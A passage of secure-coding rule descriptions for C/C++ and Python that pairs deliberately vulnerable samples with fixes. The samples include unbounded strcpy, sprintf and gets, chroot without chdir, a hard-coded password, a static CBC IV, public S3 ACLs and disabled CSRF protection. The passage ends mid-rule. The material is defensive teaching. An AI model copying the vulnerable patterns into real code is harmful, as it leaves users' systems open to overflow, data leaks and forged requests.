  • Even if your compiler does not exactly support annex K, you probably have access to similar functions, for example, strlcpy in FreeBSD
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone
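Where neither annex K nor strlcpy is available, an equivalent bounded copy can be written portably: like BSD strlcpy, it always null-terminates and returns the source length so that truncation is detectable (the name bounded_copy is illustrative):

```c
#include <string.h>

// Bounded copy modeled on BSD strlcpy: copies at most destsz - 1 bytes,
// always null-terminates when destsz > 0, and returns strlen(src) so
// callers can detect truncation (return value >= destsz means truncated).
size_t bounded_copy(char *dest, const char *src, size_t destsz) {
    size_t srclen = strlen(src);
    if (destsz > 0) {
        size_t n = (srclen < destsz - 1) ? srclen : destsz - 1;
        memcpy(dest, src, n);
        dest[n] = '\0';
    }
    return srclen;
}
```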

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char *dest = malloc(strlen(src) + 1); // For the final 0
  strcpy(dest, src); // Compliant: we made sure the buffer is large enough
  int r = doSomethingWith(dest);
  free(dest);
  return r;
}

See

cpp:S5802

The purpose of creating a jail, the "virtual root directory" created with chroot-type functions, is to limit access to the file system by isolating the process inside this jail. However, many chroot function implementations don’t modify the current working directory, so the process still has access to unauthorized resources outside of the "jail".

Ask Yourself Whether

  • The application changes the working directory before or after running chroot.
  • The application uses a path inside the jail directory as working directory.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Change the current working directory to the root directory after switching to a jail directory.

Sensitive Code Example

The current directory is not changed with the chdir function before or after the creation of a jail with the chroot function:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: no chdir before or after chroot, and missing check of return value

The chroot or chdir operations could fail, leaving the process with access to unauthorized resources. The return code should be checked:

const char* root_dir = "/jail/";
chroot(root_dir); // Sensitive: missing check of the return value
const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

Compliant Solution

To correctly isolate the application into a jail, change the current directory with chdir before the chroot and check the return code of both functions:

const char* root_dir = "/jail/";

if (chdir(root_dir) == -1) {
  exit(-1);
}

if (chroot(root_dir) == -1) {  // compliant: the current dir is changed to the jail and the results of both functions are checked
  exit(-1);
}

See

cpp:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data that decompresses into gigabytes of data. To achieve this extreme compression ratio, attackers compress highly redundant data (e.g. a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold. In particular, it’s not recommended to recursively expand archives (an entry of an archive could itself be an archive).

Sensitive Code Example

#include <archive.h>
#include <archive_entry.h>
// ...

void f(const char *filename, int flags) {
  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);

  if ((archive_read_open_filename(a, filename, 10240))) {
    return;
  }

  for (;;) {
    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      return;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);
}

Compliant Solution

#include <archive.h>
#include <archive_entry.h>
// ...

int f(const char *filename, int flags) {
  const int max_number_of_extracted_entries = 1000;
  const int64_t max_file_size = 1000000000; // 1 GB

  int number_of_extracted_entries = 0;
  int64_t total_file_size = 0;

  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);
  int status = 0;

  if ((archive_read_open_filename(a, filename, 10240))) {
    return -1;
  }

  for (;;) {
    number_of_extracted_entries++;
    if (number_of_extracted_entries > max_number_of_extracted_entries) {
      status = 1;
      break;
    }

    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      status = -1;
      break;
    }

    int64_t file_size = archive_entry_size(entry);
    total_file_size += file_size;
    if (total_file_size > max_file_size) {
      status = 1;
      break;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);

  return status;
}

See

cpp:S6069

When using sprintf, it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

Ask Yourself Whether

  • The provided buffer is guaranteed to be large enough for the result of any possible call to the sprintf function (including all possible format strings and all possible additional arguments).

There is a risk if you answered no to the above question.

Recommended Secure Coding Practices

There are fundamentally safer alternatives. snprintf is one of them. It takes the size of the buffer as an additional argument, preventing the function from overflowing the buffer.

  • Use snprintf instead of sprintf. The slight performance overhead can be afforded in a vast majority of projects.
  • Check the buffer size passed to snprintf.

If you are working in C++, other safe alternatives exist:

  • std::string should be the preferred type to store strings
  • You can format to a string using std::ostringstream
  • Since C++20, std::format is also available to format strings

Sensitive Code Example

sprintf(str, "%s", message);   // Sensitive: `str` buffer size is not checked and it is vulnerable to overflows

Compliant Solution

snprintf(str, sizeof(str), "%s", message); // Prevent overflows by enforcing a maximum size for `str` buffer

Exceptions

It is a very common and acceptable pattern to compute the required size of the buffer with a call to snprintf with a null buffer, a size of 0, and the same format arguments (this writes nothing but returns the number of characters that would have been written), then to call sprintf, since the bound check is no longer needed. Note that 1 needs to be added to the size reported by snprintf to account for the terminating null character.

size_t buflen = snprintf(0, 0, "%s", message);
char* buf = malloc(buflen + 1); // For the final 0
sprintf(buf, "%s", message);

See

cpp:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications decreases the chances that attackers successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application follows the defense-in-depth principle.

Note that the http protocol is being deprecated by major web browsers.

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

char* http_url = "http://example.com"; // Sensitive
char* ftp_url = "ftp://anonymous@example.com"; // Sensitive
char* telnet_url = "telnet://anonymous@example.com"; // Sensitive
#include <curl/curl.h>

CURL *curl_ftp = curl_easy_init();
curl_easy_setopt(curl_ftp, CURLOPT_URL, "ftp://example.com/"); // Sensitive

CURL *curl_smtp = curl_easy_init();
curl_easy_setopt(curl_smtp, CURLOPT_URL, "smtp://example.com:587"); // Sensitive

Compliant Solution

char* https_url = "https://example.com";
char* sftp_url = "sftp://anonymous@example.com";
char* ssh_url = "ssh://anonymous@example.com";
#include <curl/curl.h>

CURL *curl_ftps = curl_easy_init();
curl_easy_setopt(curl_ftps, CURLOPT_URL, "ftp://example.com/");
curl_easy_setopt(curl_ftps, CURLOPT_USE_SSL, CURLUSESSL_ALL); // FTP transport is done over TLS

CURL *curl_smtp_tls = curl_easy_init();
curl_easy_setopt(curl_smtp_tls, CURLOPT_URL, "smtp://example.com:587");
curl_easy_setopt(curl_smtp_tls, CURLOPT_USE_SSL, CURLUSESSL_ALL); // SMTP with STARTTLS

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

cpp:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule looks for hard-coded credentials in variables whose names match any of the patterns from the provided list.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, file storage, an API, or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string password = "secret"; // Sensitive
dbi_conn_set_option(conn, "password", password.c_str());

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string password = getDatabasePassword(); // Compliant
dbi_conn_set_option(conn, "password", password.c_str()); // Compliant

See

cpp:S5798

Why is this an issue?

The compiler is generally allowed to remove code that does not have any effect, according to the abstract machine of the C language. This means that if you have a buffer that contains sensitive data (for instance passwords), calling memset on the buffer before releasing the memory will probably be optimized away.

The function memset_s behaves similarly to memset, but with one key difference: it cannot be optimized away, so the memory is overwritten in all cases. You should always use this function to scrub security-sensitive data.

This rule raises an issue when a call to memset is followed by the destruction of the buffer.

Note that memset_s is defined in annex K of C11, so to have access to it, you need a standard library that supports it (this can be tested with the macro __STDC_LIB_EXT1__), and you need to enable it by defining the macro __STDC_WANT_LIB_EXT1__ before including <string.h>. Other platform-specific functions can perform the same operation, for instance SecureZeroMemory (Windows) or explicit_bzero (FreeBSD).

Noncompliant code example

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset(password, ' ', strlen(password)); // Noncompliant, password is about to be freed
  memset(localToken, ' ', strlen(localToken)); // Noncompliant, localToken is about to go out of scope
  free(password);
}

Compliant solution

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset_s(password, bufferSize, ' ', strlen(password));
  memset_s(localToken, sizeof(localToken), ' ', strlen(localToken));
  free(password);
}

Resources

cpp:S1079

Why is this an issue?

The %s placeholder is used to read a word into a string.

By default, there is no restriction on the length of that word, and the developer is required to pass a sufficiently large buffer for storing it.

No matter how large the buffer is, there will always be a longer word.

Therefore, programs relying on %s are vulnerable to buffer overflows.

A field width specifier can be used together with the %s placeholder to limit the number of bytes which will be written to the buffer.

Note that an additional byte is required to store the null terminator.

Noncompliant code example

char buffer[10];
scanf("%s", buffer);      // Noncompliant - will overflow when a word longer than 9 characters is entered

Compliant solution

char buffer[10];
scanf("%9s", buffer);     // Compliant - will not overflow

Resources

cpp:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux-based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples below). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such APIs will make sure:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed
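
As an illustration of such a secure-by-design API (shown here in Python's standard tempfile module, purely to make the guarantees concrete; this rule itself targets C++):

```python
import os
import tempfile

# tempfile generates an unpredictable name, opens the file with 0600
# permissions on POSIX, makes the descriptor non-inheritable, and
# deletes the file when the handle is closed.
with tempfile.NamedTemporaryFile() as tmp:
    tmp.write(b"scratch data")
    tmp.flush()
    path = tmp.name
    assert os.path.exists(path)

# Destroyed as soon as it is closed.
assert not os.path.exists(path)
```

Equivalent C APIs (tmpfile, mkstemp) offer the same properties of unpredictable names and owner-only access.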

Sensitive Code Example

#include <cstdio>
// ...

void f() {
  FILE * fp = fopen("/tmp/temporary_file", "r"); // Sensitive
}
#include <cstdio>
#include <cstdlib>
#include <sstream>
// ...

void f() {
  std::stringstream ss;
  ss << getenv("TMPDIR") << "/temporary_file"; // Sensitive
  FILE * fp = fopen(ss.str().c_str(), "w");
}

Compliant Solution

#include <cstdio>
#include <cstdlib>
// ...

void f() {
  FILE * fp = tmpfile(); // Compliant
}

See

cpp:S1081

Why is this an issue?

When using typical C functions, it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

This rule reports use of the following insecure functions, for which knowing the required size is not generally possible: gets() and getpw().

In such cases, the only way to prevent buffer overflows while using these functions would be to control the execution context of the application.

It is much safer to secure the application from within and to use an alternate, secure function which allows you to define the maximum number of characters to be written to the buffer:

  • fgets or gets_s
  • getpwuid

Noncompliant code example

gets(str); // Noncompliant; `str` buffer size is not checked and it is vulnerable to overflows

Compliant solution

gets_s(str, sizeof(str)); // Prevent overflows by enforcing a maximum size for `str` buffer

Resources

python:S5852

Most regular expression engines use backtracking to try all possible execution paths of a regular expression when evaluating an input. In some cases this causes performance issues, called catastrophic backtracking situations. In the worst case, the complexity of the regular expression is exponential in the size of the input, meaning that a small, carefully crafted input (like 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application. Super-linear regex complexity can lead to the same impact too with, in this case, a large carefully crafted input (thousands of chars).

This rule determines the runtime complexity of a regular expression and informs you of the complexity if it is not linear.

Ask Yourself Whether

  • The input is user-controlled.
  • The input size is not restricted to a small number of characters.
  • There is no timeout in place to limit the regex evaluation time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

To avoid catastrophic backtracking situations, make sure that none of the following conditions apply to your regular expression.

In all of the following cases, catastrophic backtracking can only happen if the problematic part of the regex is followed by a pattern that can fail, causing the backtracking to actually happen. Note that when performing a full match (e.g. using re.fullmatch), the end of the regex counts as a pattern that can fail because it will only succeed when the end of the string is reached.

  • If you have a non-possessive repetition r* or r*?, such that the regex r could produce different possible matches (of possibly different lengths) on the same input, the worst case matching time can be exponential. This can be the case if r contains optional parts, alternations or additional repetitions (but not if the repetition is written in such a way that there’s only one way to match it).
  • If you have multiple non-possessive repetitions that can match the same contents and are consecutive or are only separated by an optional separator or a separator that can be matched by both of the repetitions, the worst case matching time can be polynomial (O(n^c) where c is the number of problematic repetitions). For example a*b* is not a problem because a* and b* match different things and a*_a* is not a problem because the repetitions are separated by a '_' and can’t match that '_'. However, a*a* and .*_.* have quadratic runtime.
  • If you’re performing a partial match (such as by using re.search, re.split, re.findall etc.) and the regex is not anchored to the beginning of the string, quadratic runtime is especially hard to avoid because whenever a match fails, the regex engine will try again starting at the next index. This means that any unbounded repetition (even a possessive one), if it’s followed by a pattern that can fail, can cause quadratic runtime on some inputs. For example re.split(r"\s*,", my_str) will run in quadratic time on strings that consist entirely of spaces (or at least contain large sequences of spaces, not followed by a comma).

In order to rewrite your regular expression without these patterns, consider the following strategies:

  • If applicable, define a maximum number of expected repetitions using the bounded quantifiers, like {1,5} instead of + for instance.
  • Refactor nested quantifiers to limit the number of ways the inner group can be matched by the outer quantifier. For instance, the nested quantifier in (ba+)+ doesn’t cause performance issues: the inner group can be matched only if there exists exactly one b char per repetition of the group.
  • Optimize regular expressions with possessive quantifiers and atomic grouping (available since Python 3.11).
  • Use negated character classes instead of . to exclude separators where applicable. For example the quadratic regex .*_.* can be made linear by changing it to [^_]*_.*
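
The last rewrite can be checked directly: under a full match, both patterns accept exactly the same inputs (any string containing an underscore), but only the first can backtrack quadratically. A small sketch:

```python
import re

quadratic = re.compile(r".*_.*")    # both '.*' can compete for the same text
linear = re.compile(r"[^_]*_.*")    # '[^_]*' can never cross the separator

# Under a full match, both simply mean "contains at least one underscore".
for sample in ["key_value", "a_b_c", "_leading", "trailing_"]:
    assert quadratic.fullmatch(sample) and linear.fullmatch(sample)
assert linear.fullmatch("nounderscore") is None
```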

Sometimes it’s not possible to rewrite the regex to be linear while still matching what you want it to match, especially when using partial matches, for which quadratic runtimes are quite hard to avoid. In those cases, consider the following approaches:

  • Solve the problem without regular expressions
  • Use an alternative non-backtracking regex implementation, such as Google’s RE2.
  • Use multiple passes. This could mean pre- and/or post-processing the string manually before/after applying the regular expression to it, or using multiple regular expressions. One example of this would be to replace re.split(r"\s*,\s*", my_str) with re.split(",", my_str) and then trimming the spaces from the strings as a second step.
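
The multiple-pass replacement from the last bullet can be sketched as follows (split_trimmed is a hypothetical helper name):

```python
import re

def split_trimmed(text):
    # Pass 1: split on the comma alone (no unbounded \s* repetition
    # adjacent to the delimiter, so no quadratic rescanning).
    # Pass 2: trim the surrounding whitespace from each piece.
    return [part.strip() for part in re.split(",", text)]

assert split_trimmed("a ,  b,c ") == ["a", "b", "c"]
```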

See

python:S6265

Predefined permissions, also known as canned ACLs, are an easy way to grant large privileges to predefined groups or users.

The following canned ACLs are security-sensitive:

  • PUBLIC_READ, PUBLIC_READ_WRITE grant respectively "read" and "read and write" privileges to everyone in the world (AllUsers group).
  • AUTHENTICATED_READ grants "read" privilege to all authenticated users (AuthenticatedUsers group).

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css, …).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege policy, i.e., to grant necessary permissions only to users for their required tasks. In the context of canned ACLs, set the ACL to PRIVATE (the default), and if more granularity is needed, use an appropriate S3 policy.

Sensitive Code Example

All users (i.e., anyone in the world, authenticated or not) have read and write permissions with the PUBLIC_READ_WRITE access control:

bucket = s3.Bucket(self, "bucket",
    access_control=s3.BucketAccessControl.PUBLIC_READ_WRITE     # Sensitive
)

s3deploy.BucketDeployment(self, "DeployWebsite",
    access_control=s3.BucketAccessControl.PUBLIC_READ_WRITE     # Sensitive
)

Compliant Solution

With the PRIVATE access control (the default), only the bucket owner has read/write permissions on the bucket and its ACL.

bucket = s3.Bucket(self, "bucket",
    access_control=s3.BucketAccessControl.PRIVATE       # Compliant
)

# Another example
s3deploy.BucketDeployment(self, "DeployWebsite",
    access_control=s3.BucketAccessControl.PRIVATE       # Compliant
)

See

python:S2115

Why is this an issue?

When relying on the password authentication mode for the database connection, a secure password should be chosen.

This rule raises an issue when an empty password is used.

Noncompliant code example

Flask-SQLAlchemy

def configure_app(app):
    app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://user:@domain.com" # Noncompliant

Django

# settings.py

DATABASES = {
    'postgresql_db': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'quickdb',
        'USER': 'sonarsource',
        'PASSWORD': '', # Noncompliant
        'HOST': 'localhost',
        'PORT': '5432'
    }
}

mysql/mysql-connector-python

from mysql.connector import connection

connection.MySQLConnection(host='localhost', user='sonarsource', password='')  # Noncompliant

Compliant solution

Flask-SQLAlchemy

def configure_app(app, pwd):
    app.config['SQLALCHEMY_DATABASE_URI'] = f"postgresql://user:{pwd}@domain.com" # Compliant

Django

# settings.py
import os

DATABASES = {
    'postgresql_db': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'quickdb',
        'USER': 'sonarsource',
        'PASSWORD': os.getenv('DB_PASSWORD'),      # Compliant
        'HOST': 'localhost',
        'PORT': '5432'
    }
}

mysql/mysql-connector-python

from mysql.connector import connection
import os

db_password = os.getenv('DB_PASSWORD')
connection.MySQLConnection(host='localhost', user='sonarsource', password=db_password)  # Compliant
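
One caveat when the password ends up inside a connection URI, as in the Flask-SQLAlchemy example above: special characters should be percent-encoded so they cannot corrupt the URI. A standard-library sketch (the password value is hypothetical):

```python
from urllib.parse import quote

password = "p@ss:word"  # hypothetical value, e.g. read from the environment
# Percent-encode so '@' and ':' cannot be mistaken for URI delimiters.
uri = f"postgresql://user:{quote(password, safe='')}@domain.com"

assert uri == "postgresql://user:p%40ss%3Aword@domain.com"
```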

Resources

python:S3329

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In the mode Cipher Block Chaining (CBC), each block is used as cryptographic input for the next block. For this reason, the first block requires an initialization vector (IV), also called a "starting variable" (SV).

If the same IV is used for multiple encryption sessions or messages, each new encryption of the same plaintext input would always produce the same ciphertext output. This may allow an attacker to detect patterns in the ciphertext.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, a company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in pyca

Code examples

Noncompliant code example

from cryptography.hazmat.primitives.ciphers import (
    Cipher,
    algorithms,
    modes,
)

iv     = "doNotTryThis@Home2023"
cipher = Cipher(algorithms.AES(key), modes.CBC(iv))

cipher.encryptor()  # Noncompliant

Compliant solution

In this example, the code explicitly uses a random number generator that is considered strong.

from os import urandom

from cryptography.hazmat.primitives.ciphers import (
    Cipher,
    algorithms,
    modes,
)

iv     = urandom(16)
cipher = Cipher(algorithms.AES(key), modes.CBC(iv))

cipher.encryptor()

How does this work?

Use unique IVs

To ensure strong security, the initialization vectors for each encryption operation must be unique and random but they do not have to be secret.

In the previous non-compliant example, the problem is not that the IV is hard-coded.
It is that the same IV is used for multiple encryption attempts.
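
The property the compliant example relies on can be checked with the standard library alone: each call to os.urandom draws a fresh, unpredictable value from the OS CSPRNG.

```python
from os import urandom

iv_first = urandom(16)   # one IV per encryption operation
iv_second = urandom(16)  # an independent draw for the next one

assert len(iv_first) == 16
# A collision between two 128-bit random draws is astronomically unlikely.
assert iv_first != iv_second
```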

Resources

Standards

python:S6275

Amazon Elastic Block Store (EBS) is a block-storage service for Amazon Elastic Compute Cloud (EC2). EBS volumes can be encrypted, ensuring the security of both data-at-rest and data-in-transit between an instance and its attached EBS storage. If adversaries gain physical access to the storage medium, they are not able to access the data. Encryption can be enabled for specific volumes or for all new volumes and snapshots. Volumes created from snapshots inherit their encryption configuration. A volume created from an encrypted snapshot will also be encrypted by default.

Ask Yourself Whether

  • The disk contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EBS volumes that contain sensitive information. Encryption and decryption are handled transparently by EC2, so no further modifications to the application are necessary. Instead of enabling encryption for every volume, it is also possible to enable encryption globally for a specific region. While creating volumes from encrypted snapshots will result in them being encrypted, explicitly enabling this security parameter will prevent any future unexpected security downgrade.

Sensitive Code Example

For aws_cdk.aws_ec2.Volume:

from aws_cdk.aws_ec2 import Volume

class EBSVolumeStack(Stack):

    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        Volume(self,
            "unencrypted-explicit",
            availability_zone="eu-west-1a",
            size=Size.gibibytes(1),
            encrypted=False  # Sensitive
        )
from aws_cdk.aws_ec2 import Volume

class EBSVolumeStack(Stack):

    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        Volume(self,
            "unencrypted-implicit",
            availability_zone="eu-west-1a",
            size=Size.gibibytes(1)
        ) # Sensitive as encryption is disabled by default

Compliant Solution

For aws_cdk.aws_ec2.Volume:

from aws_cdk.aws_ec2 import Volume

class EBSVolumeStack(Stack):

    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        Volume(self,
            "encrypted-explicit",
            availability_zone="eu-west-1a",
            size=Size.gibibytes(1),
            encrypted=True
        )

See

python:S6270

Resource-based policies granting access to all users can lead to information leakage.

Ask Yourself Whether

  • The AWS resource stores or processes sensitive data.
  • The AWS resource is designed to be private.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege principle, i.e. to grant necessary permissions only to users for their required tasks. In the context of resource-based policies, list the principals that need the access and grant to them only the required privileges.

Sensitive Code Example

This policy allows all users, including anonymous ones, to access an S3 bucket:

from aws_cdk.aws_iam import PolicyStatement, AnyPrincipal, Effect
from aws_cdk.aws_s3 import Bucket

bucket = Bucket(self, "ExampleBucket")

bucket.add_to_resource_policy(PolicyStatement(
  effect=Effect.ALLOW,
  actions=["s3:*"],
  resources=[bucket.arn_for_objects("*")],
  principals=[AnyPrincipal()] # Sensitive
))

Compliant Solution

This policy allows only the authorized users:

from aws_cdk.aws_iam import PolicyStatement, AccountRootPrincipal, Effect
from aws_cdk.aws_s3 import Bucket

bucket = Bucket(self, "ExampleBucket")

bucket.add_to_resource_policy(PolicyStatement(
  effect=Effect.ALLOW,
  actions=["s3:*"],
  resources=[bucket.arn_for_objects("*")],
  principals=[AccountRootPrincipal()]
))

See

python:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that they did not intend, such as updating their profile or sending a message; more generally, anything that can change the state of the application.

The attacker can trick the user/victim into clicking a link corresponding to the privileged action, or into visiting a malicious web site that embeds a hidden web request. As web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state / resources of the web application can be modified by HTTP POST or HTTP DELETE requests, for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • to be activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token
  • Sensitive operations should never be performed with safe HTTP methods like GET, which are designed to be used only for information retrieval.

Sensitive Code Example

For a Django application, the code is sensitive when:

  • django.middleware.csrf.CsrfViewMiddleware is not used in the Django settings:
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
] # Sensitive: django.middleware.csrf.CsrfViewMiddleware is missing
  • the CSRF protection is disabled on a view:
@csrf_exempt # Sensitive
def example(request):
    return HttpResponse("default")

For a Flask application, the code is sensitive when:

  • the WTF_CSRF_ENABLED setting is set to false:
app = Flask(__name__)
app.config['WTF_CSRF_ENABLED'] = False # Sensitive
  • the application doesn’t use the CSRFProtect module:
app = Flask(__name__) # Sensitive: CSRFProtect is missing

@app.route('/')
def hello_world():
    return 'Hello, World!'
  • the CSRF protection is disabled on a view:
app = Flask(__name__)
csrf = CSRFProtect()
csrf.init_app(app)

@app.route('/example/', methods=['POST'])
@csrf.exempt # Sensitive
def example():
    return 'example '
  • the CSRF protection is disabled on a form:
class unprotectedForm(FlaskForm):
    class Meta:
        csrf = False # Sensitive

    name = TextField('name')
    submit = SubmitField('submit')

Compliant Solution

For a Django application,

  • it is recommended to protect all the views with django.middleware.csrf.CsrfViewMiddleware:
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware', # Compliant
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
  • and to not disable the CSRF protection on specific views:
def example(request): # Compliant
    return HttpResponse("default")

For a Flask application,

